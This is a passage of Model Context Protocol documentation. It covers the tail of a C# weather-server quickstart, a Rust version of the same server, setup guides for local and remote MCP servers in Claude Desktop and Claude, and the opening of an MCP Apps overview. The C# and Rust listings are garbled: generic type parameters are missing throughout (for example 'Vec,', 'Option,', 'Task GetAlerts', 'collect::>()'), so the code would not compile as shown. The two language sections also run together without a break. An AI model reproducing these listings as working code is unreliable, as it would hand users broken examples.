client.DefaultRequestHeaders.UserAgent.Add(new ProductInfoHeaderValue("weather-tool", "1.0"));
return client;
});
var app = builder.Build();
await app.RunAsync();
```
When creating the `ApplicationHostBuilder`, ensure you use `CreateEmptyApplicationBuilder` instead of `CreateDefaultBuilder`. This ensures that the server does not write any additional messages to the console. This is only necessary for servers using STDIO transport.
This code sets up a basic console application that uses the Model Context Protocol SDK to create an MCP server with standard I/O transport.
### Weather API helper functions
Create an extension class for `HttpClient` which helps simplify JSON request handling:
```csharp theme={null}
using System.Text.Json;
internal static class HttpClientExt
{
public static async Task ReadJsonDocumentAsync(this HttpClient client, string requestUri)
{
using var response = await client.GetAsync(requestUri);
response.EnsureSuccessStatusCode();
return await JsonDocument.ParseAsync(await response.Content.ReadAsStreamAsync());
}
}
```
Next, define a class with the tool execution handlers for querying and converting responses from the National Weather Service API:
```csharp theme={null}
using ModelContextProtocol.Server;
using System.ComponentModel;
using System.Globalization;
using System.Text.Json;
namespace QuickstartWeatherServer.Tools;
[McpServerToolType]
public static class WeatherTools
{
[McpServerTool, Description("Get weather alerts for a US state code.")]
public static async Task GetAlerts(
HttpClient client,
[Description("The US state code to get alerts for.")] string state)
{
using var jsonDocument = await client.ReadJsonDocumentAsync($"/alerts/active/area/{state}");
var jsonElement = jsonDocument.RootElement;
var alerts = jsonElement.GetProperty("features").EnumerateArray();
if (!alerts.Any())
{
return "No active alerts for this state.";
}
return string.Join("\n--\n", alerts.Select(alert =>
{
JsonElement properties = alert.GetProperty("properties");
return $"""
Event: {properties.GetProperty("event").GetString()}
Area: {properties.GetProperty("areaDesc").GetString()}
Severity: {properties.GetProperty("severity").GetString()}
Description: {properties.GetProperty("description").GetString()}
Instruction: {properties.GetProperty("instruction").GetString()}
""";
}));
}
[McpServerTool, Description("Get weather forecast for a location.")]
public static async Task GetForecast(
HttpClient client,
[Description("Latitude of the location.")] double latitude,
[Description("Longitude of the location.")] double longitude)
{
var pointUrl = string.Create(CultureInfo.InvariantCulture, $"/points/{latitude},{longitude}");
using var jsonDocument = await client.ReadJsonDocumentAsync(pointUrl);
var forecastUrl = jsonDocument.RootElement.GetProperty("properties").GetProperty("forecast").GetString()
?? throw new Exception($"No forecast URL provided by {client.BaseAddress}points/{latitude},{longitude}");
using var forecastDocument = await client.ReadJsonDocumentAsync(forecastUrl);
var periods = forecastDocument.RootElement.GetProperty("properties").GetProperty("periods").EnumerateArray();
return string.Join("\n---\n", periods.Select(period => $"""
{period.GetProperty("name").GetString()}
Temperature: {period.GetProperty("temperature").GetInt32()}°F
Wind: {period.GetProperty("windSpeed").GetString()} {period.GetProperty("windDirection").GetString()}
Forecast: {period.GetProperty("detailedForecast").GetString()}
"""));
}
}
```
### Running the server
Finally, run the server using the following command:
```bash theme={null}
dotnet run
```
This will start the server and listen for incoming requests on standard input/output.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux. Linux users can proceed to the [Building a client](/docs/develop/build-client) tutorial to build an MCP client that connects to the server we just built.
First, make sure you have Claude for Desktop installed. [You can install the latest version
here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use. To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor. Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key. The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"weather": {
"command": "dotnet",
"args": ["run", "--project", "/ABSOLUTE/PATH/TO/PROJECT", "--no-build"]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"weather": {
"command": "dotnet",
"args": [
"run",
"--project",
"C:\\ABSOLUTE\\PATH\\TO\\PROJECT",
"--no-build"
]
}
}
}
```
This tells Claude for Desktop:
1. There's an MCP server named "weather"
2. Launch it by running `dotnet run /ABSOLUTE/PATH/TO/PROJECT`
Save the file, and restart **Claude for Desktop**.
Let's get started with building our weather server! [You can find the complete code for what we'll be building here.](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-rust)
### Prerequisite knowledge
This quickstart assumes you have familiarity with:
* Rust programming language
* Async/await in Rust
* LLMs like Claude
### Logging in MCP Servers
When implementing MCP servers, be careful about how you handle logging:
**For STDIO-based servers:** Never write to standard output (stdout). This includes:
* `print()` statements in Python
* `console.log()` in JavaScript
* `println!()` in Rust
* Similar stdout functions in other languages
Writing to stdout will corrupt the JSON-RPC messages and break your server.
**For HTTP-based servers:** Standard output logging is fine since it doesn't interfere with HTTP responses.
### Best Practices
1. Use a logging library that writes to stderr or files, such as `tracing` or `log` in Rust.
2. Configure your logging framework to avoid stdout output.
### Quick Examples
```rust theme={null}
// ❌ Bad (STDIO)
println!("Processing request");
// ✅ Good (STDIO)
use tracing::info;
info!("Processing request"); // writes to stderr
```
### System requirements
* Rust 1.70 or higher installed.
* Cargo (comes with Rust installation).
### Set up your environment
First, let's install Rust if you haven't already. You can install Rust from [rust-lang.org](https://www.rust-lang.org/tools/install):
```bash macOS/Linux theme={null}
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
```
```powershell Windows theme={null}
# Download and run rustup-init.exe from https://rustup.rs/
```
Verify your Rust installation:
```bash theme={null}
rustc --version
cargo --version
```
Now, let's create and set up our project:
```bash macOS/Linux theme={null}
# Create a new Rust project
cargo new weather
cd weather
```
```powershell Windows theme={null}
# Create a new Rust project
cargo new weather
cd weather
```
Update your `Cargo.toml` to add the required dependencies:
```toml Cargo.toml theme={null}
[package]
name = "weather"
version = "0.1.0"
edition = "2024"
[dependencies]
rmcp = { version = "0.3", features = ["server", "macros", "transport-io"] }
tokio = { version = "1.46", features = ["full"] }
reqwest = { version = "0.12", features = ["json"] }
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
anyhow = "1.0"
tracing = "0.1"
tracing-subscriber = { version = "0.3", features = ["env-filter", "std", "fmt"] }
```
Now let's dive into building your server.
## Building your server
### Importing packages and constants
Open `src/main.rs` and add these imports and constants at the top:
```rust theme={null}
use anyhow::Result;
use rmcp::{
ServerHandler, ServiceExt,
handler::server::{router::tool::ToolRouter, tool::Parameters},
model::*,
schemars, tool, tool_handler, tool_router,
};
use serde::Deserialize;
use serde::de::DeserializeOwned;
const NWS_API_BASE: &str = "https://api.weather.gov";
const USER_AGENT: &str = "weather-app/1.0";
```
The `rmcp` crate provides the Model Context Protocol SDK for Rust, with features for server implementation, procedural macros, and stdio transport.
### Data structures
Next, let's define the data structures for deserializing responses from the National Weather Service API:
```rust theme={null}
#[derive(Debug, Deserialize)]
struct AlertsResponse {
features: Vec,
}
#[derive(Debug, Deserialize)]
struct AlertFeature {
properties: AlertProperties,
}
#[derive(Debug, Deserialize)]
struct AlertProperties {
event: Option,
#[serde(rename = "areaDesc")]
area_desc: Option,
severity: Option,
description: Option,
instruction: Option,
}
#[derive(Debug, Deserialize)]
struct PointsResponse {
properties: PointsProperties,
}
#[derive(Debug, Deserialize)]
struct PointsProperties {
forecast: String,
}
#[derive(Debug, Deserialize)]
struct ForecastResponse {
properties: ForecastProperties,
}
#[derive(Debug, Deserialize)]
struct ForecastProperties {
periods: Vec,
}
#[derive(Debug, Deserialize)]
struct ForecastPeriod {
name: String,
temperature: i32,
#[serde(rename = "temperatureUnit")]
temperature_unit: String,
#[serde(rename = "windSpeed")]
wind_speed: String,
#[serde(rename = "windDirection")]
wind_direction: String,
#[serde(rename = "detailedForecast")]
detailed_forecast: String,
}
```
Now define the request types that MCP clients will send:
```rust theme={null}
#[derive(serde::Deserialize, schemars::JsonSchema)]
pub struct MCPForecastRequest {
latitude: f32,
longitude: f32,
}
#[derive(serde::Deserialize, schemars::JsonSchema)]
pub struct MCPAlertRequest {
state: String,
}
```
### Helper functions
Add helper functions for making API requests and formatting responses:
```rust theme={null}
async fn make_nws_request(url: &str) -> Result {
let client = reqwest::Client::new();
let rsp = client
.get(url)
.header(reqwest::header::USER_AGENT, USER_AGENT)
.header(reqwest::header::ACCEPT, "application/geo+json")
.send()
.await?
.error_for_status()?;
Ok(rsp.json::().await?)
}
fn format_alert(feature: &AlertFeature) -> String {
let props = &feature.properties;
format!(
"Event: {}\nArea: {}\nSeverity: {}\nDescription: {}\nInstructions: {}",
props.event.as_deref().unwrap_or("Unknown"),
props.area_desc.as_deref().unwrap_or("Unknown"),
props.severity.as_deref().unwrap_or("Unknown"),
props
.description
.as_deref()
.unwrap_or("No description available"),
props
.instruction
.as_deref()
.unwrap_or("No specific instructions provided")
)
}
fn format_period(period: &ForecastPeriod) -> String {
format!(
"{}:\nTemperature: {}°{}\nWind: {} {}\nForecast: {}",
period.name,
period.temperature,
period.temperature_unit,
period.wind_speed,
period.wind_direction,
period.detailed_forecast
)
}
```
### Implementing the Weather server and tools
Now let's implement the main Weather server struct with the tool handlers:
```rust theme={null}
pub struct Weather {
tool_router: ToolRouter,
}
#[tool_router]
impl Weather {
fn new() -> Self {
Self {
tool_router: Self::tool_router(),
}
}
#[tool(description = "Get weather alerts for a US state.")]
async fn get_alerts(
&self,
Parameters(MCPAlertRequest { state }): Parameters,
) -> String {
let url = format!(
"{}/alerts/active/area/{}",
NWS_API_BASE,
state.to_uppercase()
);
match make_nws_request::(&url).await {
Ok(data) => {
if data.features.is_empty() {
"No active alerts for this state.".to_string()
} else {
data.features
.iter()
.map(format_alert)
.collect::>()
.join("\n---\n")
}
}
Err(_) => "Unable to fetch alerts or no alerts found.".to_string(),
}
}
#[tool(description = "Get weather forecast for a location.")]
async fn get_forecast(
&self,
Parameters(MCPForecastRequest {
latitude,
longitude,
}): Parameters,
) -> String {
let points_url = format!("{NWS_API_BASE}/points/{latitude},{longitude}");
let Ok(points_data) = make_nws_request::(&points_url).await else {
return "Unable to fetch forecast data for this location.".to_string();
};
let forecast_url = points_data.properties.forecast;
let Ok(forecast_data) = make_nws_request::(&forecast_url).await else {
return "Unable to fetch forecast data for this location.".to_string();
};
let periods = &forecast_data.properties.periods;
let forecast_summary: String = periods
.iter()
.take(5) // Next 5 periods only
.map(format_period)
.collect::>()
.join("\n---\n");
forecast_summary
}
}
```
The `#[tool_router]` macro automatically generates the routing logic, and the `#[tool]` attribute marks methods as MCP tools.
### Implementing the ServerHandler
Implement the `ServerHandler` trait to define server capabilities:
```rust theme={null}
#[tool_handler]
impl ServerHandler for Weather {
fn get_info(&self) -> ServerInfo {
ServerInfo {
capabilities: ServerCapabilities::builder().enable_tools().build(),
..Default::default()
}
}
}
```
### Running the server
Finally, implement the main function to run the server with stdio transport:
```rust theme={null}
#[tokio::main]
async fn main() -> Result<()> {
let transport = (tokio::io::stdin(), tokio::io::stdout());
let service = Weather::new().serve(transport).await?;
service.waiting().await?;
Ok(())
}
```
Build your server with:
```bash theme={null}
cargo build --release
```
The compiled binary will be in `target/release/weather`.
Let's now test your server from an existing MCP host, Claude for Desktop.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux. Linux users can proceed to the [Building a client](/docs/develop/build-client) tutorial to build an MCP client that connects to the server we just built.
First, make sure you have Claude for Desktop installed. [You can install the latest version here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use. To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor. Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key. The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"weather": {
"command": "/ABSOLUTE/PATH/TO/PARENT/FOLDER/weather/target/release/weather"
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"weather": {
"command": "C:\\ABSOLUTE\\PATH\\TO\\PARENT\\FOLDER\\weather\\target\\release\\weather.exe"
}
}
}
```
Make sure you pass in the absolute path to your compiled binary. You can get this by running `pwd` on macOS/Linux or `cd` on Windows Command Prompt from your project directory. On Windows, remember to use double backslashes (`\\`) or forward slashes (`/`) in the JSON path, and add the `.exe` extension.
This tells Claude for Desktop:
1. There's an MCP server named "weather"
2. Launch it by running the compiled binary at the specified path
Save the file, and restart **Claude for Desktop**.
### Test with commands
Let's make sure Claude for Desktop is picking up the two tools we've exposed in our `weather` server. You can do this by looking for the "Add files, connectors, and more /" icon:
After clicking on the plus icon, hover over the "Connectors" menu. You should see the `weather` servers listed:
If your server isn't being picked up by Claude for Desktop, proceed to the [Troubleshooting](#troubleshooting) section for debugging tips.
If the server has shown up in the "Connectors" menu, you can now test your server by running the following commands in Claude for Desktop:
* What's the weather in Sacramento?
* What are the active weather alerts in Texas?
Since this is the US National Weather service, the queries will only work for US locations.
## What's happening under the hood
When you ask a question:
1. The client sends your question to Claude
2. Claude analyzes the available tools and decides which one(s) to use
3. The client executes the chosen tool(s) through the MCP server
4. The results are sent back to Claude
5. Claude formulates a natural language response
6. The response is displayed to you!
## Troubleshooting
**Getting logs from Claude for Desktop**
Claude.app logging related to MCP is written to log files in `~/Library/Logs/Claude`:
* `mcp.log` will contain general logging about MCP connections and connection failures.
* Files named `mcp-server-SERVERNAME.log` will contain error (stderr) logging from the named server.
You can run the following command to list recent logs and follow along with any new ones:
```bash theme={null}
# Check Claude's logs for errors
tail -n 20 -f ~/Library/Logs/Claude/mcp*.log
```
**Server not showing up in Claude**
1. Check your `claude_desktop_config.json` file syntax
2. Make sure the path to your project is absolute and not relative
3. Restart Claude for Desktop completely
To properly restart Claude for Desktop, you must fully quit the application:
* **Windows**: Right-click the Claude icon in the system tray (which may be hidden in the "hidden icons" menu) and select "Quit" or "Exit".
* **macOS**: Use Cmd+Q or select "Quit Claude" from the menu bar.
Simply closing the window does not fully quit the application, and your MCP server configuration changes will not take effect.
**Tool calls failing silently**
If Claude attempts to use the tools but they fail:
1. Check Claude's logs for errors
2. Verify your server builds and runs without errors
3. Try restarting Claude for Desktop
**None of this is working. What do I do?**
Please refer to our [debugging guide](/legacy/tools/debugging) for better debugging tools and more detailed guidance.
**Error: Failed to retrieve grid point data**
This usually means either:
1. The coordinates are outside the US
2. The NWS API is having issues
3. You're being rate limited
Fix:
* Verify you're using US coordinates
* Add a small delay between requests
* Check the NWS API status page
**Error: No active alerts for \[STATE]**
This isn't an error - it just means there are no current weather alerts for that state. Try a different state or check during severe weather.
For more advanced troubleshooting, check out our guide on [Debugging MCP](/legacy/tools/debugging)
## Next steps
Learn how to build your own MCP client that can connect to your server
Check out our gallery of official MCP servers and implementations
Learn how to effectively debug MCP servers and integrations
Learn how to use LLMs like Claude to speed up your MCP development
# Connect to local MCP servers
Source: https://modelcontextprotocol.io/docs/develop/connect-local-servers
Learn how to extend Claude Desktop with local MCP servers to enable file system access and other powerful integrations
Model Context Protocol (MCP) servers extend AI applications' capabilities by providing secure, controlled access to local resources and tools. Many clients support MCP, enabling diverse integration possibilities across different platforms and applications.
This guide demonstrates how to connect to local MCP servers using Claude Desktop as an example, one of the [many clients that support MCP](/clients). While we focus on Claude Desktop's implementation, the concepts apply broadly to other MCP-compatible clients. By the end of this tutorial, Claude will be able to interact with files on your computer, create new documents, organize folders, and search through your file system—all with your explicit permission for each action.
## Prerequisites
Before starting this tutorial, ensure you have the following installed on your system:
### Claude Desktop
Download and install [Claude Desktop](https://claude.ai/download) for your operating system. Claude Desktop is available for macOS and Windows.
If you already have Claude Desktop installed, verify you're running the latest version by clicking the Claude menu and selecting "Check for Updates..."
### Node.js
The Filesystem Server and many other MCP servers require Node.js to run. Verify your Node.js installation by opening a terminal or command prompt and running:
```bash theme={null}
node --version
```
If Node.js is not installed, download it from [nodejs.org](https://nodejs.org/). We recommend the LTS (Long Term Support) version for stability.
## Understanding MCP Servers
MCP servers are programs that run on your computer and provide specific capabilities to Claude Desktop through a standardized protocol. Each server exposes tools that Claude can use to perform actions, with your approval. The Filesystem Server we'll install provides tools for:
* Reading file contents and directory structures
* Creating new files and directories
* Moving and renaming files
* Searching for files by name or content
All actions require your explicit approval before execution, ensuring you maintain full control over what Claude can access and modify.
## Installing the Filesystem Server
The process involves configuring Claude Desktop to automatically start the Filesystem Server whenever you launch the application. This configuration is done through a JSON file that tells Claude Desktop which servers to run and how to connect to them.
Start by accessing the Claude Desktop settings. Click on the Claude menu in your system's menu bar (not the settings within the Claude window itself) and select "Settings..."
On macOS, this appears in the top menu bar:
This opens the Claude Desktop configuration window, which is separate from your Claude account settings.
In the Settings window, navigate to the "Developer" tab in the left sidebar. This section contains options for configuring MCP servers and other developer features.
Click the "Edit Config" button to open the configuration file:
This action creates a new configuration file if one doesn't exist, or opens your existing configuration. The file is located at:
* **macOS**: `~/Library/Application Support/Claude/claude_desktop_config.json`
* **Windows**: `%APPDATA%\Claude\claude_desktop_config.json`
Replace the contents of the configuration file with the following JSON structure. This configuration tells Claude Desktop to start the Filesystem Server with access to specific directories:
```json macOS theme={null}
{
"mcpServers": {
"filesystem": {
"command": "npx",
"args": [
"-y",
"@modelcontextprotocol/server-filesystem",
"/Users/username/Desktop",
"/Users/username/Downloads"
]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"filesystem": {
"command": "npx",
"args": [
"-y",
"@modelcontextprotocol/server-filesystem",
"C:\\Users\\username\\Desktop",
"C:\\Users\\username\\Downloads"
]
}
}
}
```
Replace `username` with your actual computer username. The paths listed in the `args` array specify which directories the Filesystem Server can access. You can modify these paths or add additional directories as needed.
**Understanding the Configuration**
* `"filesystem"`: A friendly name for the server that appears in Claude Desktop
* `"command": "npx"`: Uses Node.js's npx tool to run the server
* `"-y"`: Automatically confirms the installation of the server package
* `"@modelcontextprotocol/server-filesystem"`: The package name of the Filesystem Server
* The remaining arguments: Directories the server is allowed to access
**Security Consideration**
Only grant access to directories you're comfortable with Claude reading and modifying. The server runs with your user account permissions, so it can perform any file operations you can perform manually.
After saving the configuration file, completely quit Claude Desktop and restart it. The application needs to restart to load the new configuration and start the MCP server.
Upon successful restart, you'll see an MCP server indicator in the bottom-right corner of the conversation input box:
Click on this indicator to view the available tools provided by the Filesystem Server:
If the server indicator doesn't appear, refer to the [Troubleshooting](#troubleshooting) section for debugging steps.
## Using the Filesystem Server
With the Filesystem Server connected, Claude can now interact with your file system. Try these example requests to explore the capabilities:
### File Management Examples
* **"Can you write a poem and save it to my desktop?"** - Claude will compose a poem and create a new text file on your desktop
* **"What work-related files are in my downloads folder?"** - Claude will scan your downloads and identify work-related documents
* **"Please organize all images on my desktop into a new folder called 'Images'"** - Claude will create a folder and move image files into it
### How Approval Works
Before executing any file system operation, Claude will request your approval. This ensures you maintain control over all actions:
Review each request carefully before approving. You can always deny a request if you're not comfortable with the proposed action.
## Troubleshooting
If you encounter issues setting up or using the Filesystem Server, these solutions address common problems:
1. Restart Claude Desktop completely
2. Check your `claude_desktop_config.json` file syntax
3. Make sure the file paths included in `claude_desktop_config.json` are valid and that they are absolute and not relative
4. Look at [logs](#getting-logs-from-claude-for-desktop) to see why the server is not connecting
5. In your command line, try manually running the server (replacing `username` as you did in `claude_desktop_config.json`) to see if you get any errors:
```bash macOS/Linux theme={null}
npx -y @modelcontextprotocol/server-filesystem /Users/username/Desktop /Users/username/Downloads
```
```powershell Windows theme={null}
npx -y @modelcontextprotocol/server-filesystem C:\Users\username\Desktop C:\Users\username\Downloads
```
Claude.app logging related to MCP is written to log files in:
* macOS: `~/Library/Logs/Claude`
* Windows: `%APPDATA%\Claude\logs`
* `mcp.log` will contain general logging about MCP connections and connection failures.
* Files named `mcp-server-SERVERNAME.log` will contain error (stderr) logging from the named server.
You can run the following command to list recent logs and follow along with any new ones (on Windows, it will only show recent logs):
```bash macOS/Linux theme={null}
tail -n 20 -f ~/Library/Logs/Claude/mcp*.log
```
```powershell Windows theme={null}
type "%APPDATA%\Claude\logs\mcp*.log"
```
If Claude attempts to use the tools but they fail:
1. Check Claude's logs for errors
2. Verify your server builds and runs without errors
3. Try restarting Claude Desktop
Please refer to our [debugging guide](/legacy/tools/debugging) for better debugging tools and more detailed guidance.
If your configured server fails to load, and you see within its logs an error referring to `${APPDATA}` within a path, you may need to add the expanded value of `%APPDATA%` to your `env` key in `claude_desktop_config.json`:
```json theme={null}
{
"brave-search": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-brave-search"],
"env": {
"APPDATA": "C:\\Users\\user\\AppData\\Roaming\\",
"BRAVE_API_KEY": "..."
}
}
}
```
With this change in place, launch Claude Desktop once again.
**npm should be installed globally**
The `npx` command may continue to fail if you have not installed npm globally. If npm is already installed globally, you will find `%APPDATA%\npm` exists on your system. If not, you can install npm globally by running the following command:
```bash theme={null}
npm install -g npm
```
## Next Steps
Now that you've successfully connected Claude Desktop to a local MCP server, explore these options to expand your setup:
Browse our collection of official and community-created MCP servers for
additional capabilities
Create custom MCP servers tailored to your specific workflows and
integrations
Learn how to connect Claude to remote MCP servers for cloud-based tools and
services
Dive deeper into how MCP works and its architecture
# Connect to remote MCP Servers
Source: https://modelcontextprotocol.io/docs/develop/connect-remote-servers
Learn how to connect Claude to remote MCP servers and extend its capabilities with internet-hosted tools and data sources
Remote MCP servers extend AI applications' capabilities beyond your local environment, providing access to internet-hosted tools, services, and data sources. By connecting to remote MCP servers, you transform AI assistants from helpful tools into informed teammates capable of handling complex, multi-step projects with real-time access to external resources.
Many clients now support remote MCP servers, enabling a wide range of integration possibilities. This guide demonstrates how to connect to remote MCP servers using [Claude](https://claude.ai/) as an example, one of the [many clients that support MCP](/clients). While we focus on Claude's implementation through Custom Connectors, the concepts apply broadly to other MCP-compatible clients.
## Understanding Remote MCP Servers
Remote MCP servers function similarly to local MCP servers but are hosted on the internet rather than your local machine. They expose tools, prompts, and resources that Claude can use to perform tasks on your behalf. These servers can integrate with various services such as project management tools, documentation systems, code repositories, and any other API-enabled service.
The key advantage of remote MCP servers is their accessibility. Unlike local servers that require installation and configuration on each device, remote servers are available from any MCP client with an internet connection. This makes them ideal for web-based AI applications, integrations that emphasize ease of use, and services that require server-side processing or authentication.
## What are Custom Connectors?
Custom Connectors serve as the bridge between Claude and remote MCP servers. They allow you to connect Claude directly to the tools and data sources that matter most to your workflows, enabling Claude to operate within your favorite software and draw insights from the complete context of your external tools.
With Custom Connectors, you can:
* [Connect Claude to existing remote MCP servers](https://support.anthropic.com/en/articles/11175166-getting-started-with-custom-connectors-using-remote-mcp) provided by third-party developers
* [Build your own remote MCP servers to connect with any tool](https://support.anthropic.com/en/articles/11503834-building-custom-connectors-via-remote-mcp-servers)
## Connecting to a Remote MCP Server
The process of connecting Claude to a remote MCP server involves adding a Custom Connector through the [Claude interface](https://claude.ai/). This establishes a secure connection between Claude and your chosen remote server.
Open Claude in your browser and navigate to the settings page. You can access this by clicking on your profile icon and selecting "Settings" from the dropdown menu. Once in settings, locate and click on the "Connectors" section in the sidebar.
This will display your currently configured connectors and provide options to add new ones.
In the Connectors section, scroll to the bottom where you'll find the "Add custom connector" button. Click this button to begin the connection process.
A dialog will appear prompting you to enter the remote MCP server URL. This URL should be provided by the server developer or administrator. Enter the complete URL, ensuring it includes the proper protocol (https\://) and any necessary path components.
After entering the URL, click "Add" to proceed with the connection.
Most remote MCP servers require authentication to ensure secure access to their resources. The authentication process varies depending on the server implementation but commonly involves OAuth, API keys, or username/password combinations.
Follow the authentication prompts provided by the server. This may redirect you to a third-party authentication provider or display a form within Claude. Once authentication is complete, Claude will establish a secure connection to the remote server.
After successful connection, the remote server's resources and prompts become available in your Claude conversations. You can access these by clicking the paperclip icon in the message input area, which opens the attachment menu.
The menu displays all available resources and prompts from your connected servers. Select the items you want to include in your conversation. These resources provide Claude with context and information from your external tools.
Remote MCP servers often expose multiple tools with varying capabilities. You can control which tools Claude is allowed to use by configuring permissions in the connector settings. This ensures Claude only performs actions you've explicitly authorized.
Navigate back to the Connectors settings and click on your connected server. Here you can enable or disable specific tools, set usage limits, and configure other security parameters according to your needs.
## Best Practices for Using Remote MCP Servers
When working with remote MCP servers, consider these recommendations to ensure a secure and efficient experience:
**Security considerations**: Always verify the authenticity of remote MCP servers before connecting. Only connect to servers from trusted sources, and review the permissions requested during authentication. Be cautious about granting access to sensitive data or systems.
**Managing multiple connectors**: You can connect to multiple remote MCP servers simultaneously. Organize your connectors by purpose or project to maintain clarity. Regularly review and remove connectors you no longer use to keep your workspace organized and secure.
## Next Steps
Now that you've connected Claude to a remote MCP server, you can explore its capabilities in your conversations. Try using the connected tools to automate tasks, access external data, or integrate with your existing workflows.
Create custom remote MCP servers to integrate with proprietary tools and
services
Browse our collection of official and community-created MCP servers
Learn how to connect Claude Desktop to local MCP servers for direct system
access
Dive deeper into how MCP works and its architecture
Remote MCP servers unlock powerful possibilities for extending Claude's capabilities. As you become familiar with these integrations, you'll discover new ways to streamline your workflows and accomplish complex tasks more efficiently.
# MCP Apps
Source: https://modelcontextprotocol.io/docs/extensions/apps
Build interactive UI applications that render inside MCP hosts like Claude Desktop
For comprehensive API documentation, advanced patterns, and the full specification, visit the [official MCP Apps documentation](https://modelcontextprotocol.github.io/ext-apps).
Text responses can only go so far. Sometimes users need to interact with data, not
just read about it. MCP Apps let servers return interactive HTML interfaces (data
visualizations, forms, dashboards) that render directly in the chat.
## Why not just build a web app?
You could build a standalone web app and send users a link. However, MCP Apps
offer these key advantages that a separate page can't match:
**Context preservation.** The app lives inside the conversation. Users don't
switch tabs, lose their place, or wonder which chat thread had that dashboard.
The UI is right there, alongside the discussion that led to it.
**Bidirectional data flow.** Your app can call any tool on the MCP server, and
the host can push fresh results to your app. A standalone web app would need its
own API, authentication, and state management. MCP Apps get this via existing
MCP patterns.
**Integration with the host's capabilities**. The app can delegate actions to the host, which can then invoke the capabilities and tools the user has already connected (subject to user consent). Instead of every app implementing and maintaining direct integrations (e.g., email providers), the app can request an outcome (like “schedule this meeting”), and the host routes it through the user’s existing connected capabilities.
**Security guarantees.** MCP Apps run in a sandboxed iframe controlled by the
host. They can't access the parent page, steal cookies, or escape their
container. This means hosts can safely render third-party apps without trusting
the server author completely.
If your use case doesn't benefit from these properties, a regular web app might
be simpler. But if you want tight integration with the LLM-based conversation,
MCP Apps are a much better tool.
## How MCP Apps work
Traditional MCP tools return text, images, resources or structured data that the host displays as
part of the conversation. MCP Apps extend this pattern by allowing tools to
declare a reference to an interactive UI in their tool description that the host
renders in place.
The core pattern combines two MCP primitives: a tool that declares a UI resource
in its description, plus a UI resource that renders data as an interactive HTML
interface.
When a large language model (LLM) decides to call a tool that supports MCP Apps,
here's what happens:
1. **UI preloading**: The tool description includes a `_meta.ui.resourceUri`
field pointing to a `ui://` resource. The host can preload this resource before
the tool is even called, enabling features like streaming tool inputs to the
app.
2. **Resource fetch**: The host fetches the UI resource from the server. This
resource contains an HTML page, often bundled with its JavaScript and CSS for
simplicity. Apps can also load external scripts and resources from origins
specified in `_meta.ui.csp`.
3. **Sandboxed rendering**: Web hosts typically render the HTML inside a
sandboxed [iframe](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe)
within the conversation. The sandbox restricts the app's access to the parent
page, ensuring security. The resource's `_meta.ui` object can include
`permissions` to request additional capabilities (e.g., microphone, camera)
and `csp` to control what external origins the app can load resources from.
4. **Bidirectional communication**: The app and host communicate through a
JSON-RPC protocol that forms its own dialect of MCP. Some requests and
notifications are shared with the core MCP protocol (e.g., `tools/call`), some
are similar (e.g., `ui/initialize`), and most are new with a `ui/` method name
prefix. The app can request tool calls, send messages, update the model's
context, and receive data from the host.
```mermaid theme={null}
sequenceDiagram
participant User
participant Agent
participant App as MCP App iframe
participant Server as MCP Server
User->>Agent: "show me analytics"
Note over User,App: Interactive app rendered in chat
Agent->>Server: tools/call
Server-->>Agent: tool input/result
Agent-->>App: tool result pushed to app
User->>App: user interacts
App->>Agent: tools/call request
Agent->>Server: tools/call (forwarded)
Server-->>Agent: fresh data
Agent-->>App: fresh data
Note over User,App: App updates with new data
App-->>Agent: context update
```
The app stays isolated from the host but can still call MCP tools through the
secure postMessage channel.
## When to use MCP Apps
MCP Apps are a good fit when your use case involves:
**Exploring complex data.** A user asks "show me sales by region." A text
response might list numbers, but an MCP App can render an interactive map where
users click regions to drill down, hover for details, and toggle between
metrics, all without additional prompts.
**Configuring with many options.** Setting up a deployment involves dozens of
interdependent choices. Rather than a back-and-forth conversation ("Which
region?" "What instance size?" "Enable autoscaling?"), an MCP App presents a
form where users see all options at once, with validation and defaults.
**Viewing rich media.** When a user asks to review a PDF, see a 3D model, or
preview generated images, text descriptions fall short. An MCP App embeds the
actual viewer (pan, zoom, rotate) directly in the conversation.
**Real-time monitoring.** A dashboard showing live metrics, logs, or system
status needs continuous updates. An MCP App maintains a persistent connection,
updating the display as data changes without requiring the user to ask "what's
the status now?"
**Multi-step workflows.** Approving expense reports, reviewing code changes, or
triaging issues involves examining items one by one. An MCP App provides
navigation controls, action buttons, and state that persists across
interactions.
## Getting started
You'll need [Node.js](https://nodejs.org/en/download) 18 or higher. Familiarity
with [MCP tools](/specification/2025-11-25/server/tools) and
[resources](/specification/2025-11-25/server/resources) is recommended since MCP
Apps combine both primitives. Experience with the
[MCP TypeScript SDK](https://github.com/modelcontextprotocol/typescript-sdk)
will help you better understand the server-side patterns.
The fastest way to create an MCP App is using an AI coding agent with the MCP
